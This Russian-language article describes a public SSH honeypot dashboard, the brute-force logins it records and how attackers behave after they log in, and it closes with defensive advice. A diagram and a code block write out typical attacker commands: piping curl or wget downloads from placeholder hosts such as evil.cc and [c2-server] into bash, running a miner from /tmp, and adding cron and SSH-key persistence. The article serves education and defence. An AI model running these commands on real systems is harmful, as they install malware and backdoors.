Смотри, как боты ломятся в дверь

На платформе honeypotlive.cc запустили публичный дашборд, который показывает атаки на SSH-приманку в режиме реального времени. Дашборд отображает живую телеметрию SSH honeypot (ловушки-сервера, имитирующего настоящую систему) в целях исследования безопасности, сбора threat intelligence и обучения. Любой желающий может открыть сайт и буквально наблюдать, как автоматические боты пытаются взломать сервер прямо сейчас.

ℹ Что такое honeypot?
Honeypot («горшочек с мёдом») — специально развёрнутый сервер-приманка, который намеренно выглядит уязвимым. Он не хранит реальных данных, зато собирает информацию о тактиках атакующих.

Что именно показывает дашборд

На дашборде видны IP-адреса источников, имена пользователей, пароли, команды, клиентские fingerprint-ы и метаданные входящих подключений. При этом IP-адрес может принадлежать скомпрометированному хосту, прокси, VPN, сканеру, облачному инстансу или узлу ботнета — и не обязательно указывает на реального злоумышленника.

Данные могут включать команды, введённые атакующими, учётные данные, URL, публичные ключи, попытки доставки вредоносного ПО и другой недоверенный контент.

⚠ Важно
Отображаемые данные не следует считать достоверной атрибуцией или безопасным для запуска кодом. Не копируйте и не запускайте команды, которые видите в логах.

Как выглядит типичная атака

Поток атак на SSH — не случайные одиночки, а хорошо отлаженные автоматы. SSH остаётся самым атакуемым протоколом: большинство атак — это автоматизированные боты credential stuffing, перебирающие стандартные комбинации логин/пароль. Топ встречаемых пар — root:root, admin:admin, root:123456 — предсказуемы, но встречаются и целевые словари под конкретные платформы и облачных провайдеров.

80% соединений используют SSH-клиенты на Go. Это не люди, вручную набирающие ssh root@yourserver — это автоматизированные инструменты и кастомные сканеры, созданные для массового перебора учётных данных.


sequenceDiagram
    participant Bot as 🤖 Бот
    participant HP as 🍯 Honeypot (SSH)
    participant DB as 📊 Дашборд
    Bot->>HP: Подключение (порт 22)
    HP->>Bot: Принять соединение
    Bot->>HP: root:123456 / admin:admin
    HP->>DB: Записать IP, пароль, fingerprint
    Bot->>HP: curl http://evil.cc/miner.sh | bash
    HP->>DB: Записать команду, URL, payload
    HP-->>Bot: Симулировать среду

Что делают боты после «входа»

После аутентификации атакующие, как правило, следуют стандартному сценарию: загружают криптомайнер или агент ботнета через curl или wget, закрепляются через cron-задачи и пытаются горизонтально распространиться, сканируя внутренние сети.

Атакующие, успешно залогинившиеся в SSH-ловушку, скачивали вредоносное ПО: IRC-боты, Mirai, XMRig-криптомайнеры и другие.

# Типичные команды, которые боты выполняют после входа
curl -fsSL http://[c2-server]/install.sh | bash
wget -q http://[c2-server]/miner -O /tmp/.x && chmod +x /tmp/.x && /tmp/.x
crontab -e  # добавить персистентность
ssh-keygen && cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

Масштаб угрозы в цифрах

ПоказательДанные
SSH-попыток за период наблюдения12 224+ подключений
Соотношение провальных / успешных входов4,6 : 1
Доля Go-based клиентов среди атакующих~80%
Самые частые пароли123456, admin, root, password
Типы малвари после входаMirai, XMRig, IRC-боты, бэкдоры

Исследования фиксируют более 12 000 SSH-попыток подключения за один период наблюдения, с пиками активности, вероятно связанными с деятельностью ботнетов или плановыми кампаниями сканирования. Высокий объём демонстрирует распространённость автоматической разведки и важность активного мониторинга.

Эволюция атак: боты умнеют

Простой перебор паролей — уже не единственная тактика. Исследования трёхлетнего хоннета фиксируют тренд к более «исследовательским» атакам: атакующие всё чаще выходят за рамки слепого выполнения скриптов. Новые боты применяют уникальные методы, а устоявшиеся ботнеты со временем меняют подходы. В последние месяцы атакующие перешли к тактике предварительной разведки, проявляя возросшую адаптивность.

Ценность honeypot — не только в детектировании атак, но и в понимании поведения атакующих, что позволяет укрепить реальную инфраструктуру.

Популярные SSH-ловушки

Cowrie — давний, поддерживаемый сообществом SSH и Telnet honeypot, дающий защитникам глубокую видимость действий атакующих. Он возник как форк Kippo в 2014 году и вырос в авторитетный инструмент в сообществе threat intelligence. В отличие от low-interaction ловушек, Cowrie симулирует убедительную Linux-подобную оболочку с поддельной файловой системой, записывая каждую введённую команду.

💡 Попробуй сам
Если хочешь развернуть собственный SSH-honeypot, начни с Cowrie — он прост в настройке, хорошо документирован и умеет записывать полные сессии атакующих. Инструкция есть на GitHub Cowrie.

Зачем это нужно отрасли

По мере того как киберугрозы продолжают эволюционировать, организации всё активнее используют продвинутые механизмы безопасности. Honeypot-ы как инструменты обмана играют ключевую роль в системах обнаружения вторжений, собирая разведывательные данные о тактиках атакующих.

Публичный дашборд вроде honeypotlive.cc делает этот процесс видимым для всех — от студентов до CISO. Смотреть на атаки в реальном времени куда нагляднее любого учебника.

📝 Практический вывод
Фундаментальные рекомендации остаются прежними: отключи парольную аутентификацию там, где это возможно, агрессивно патчи системы и отслеживай конкретные индикаторы компрометации, которые раскрывают honeypot-ы.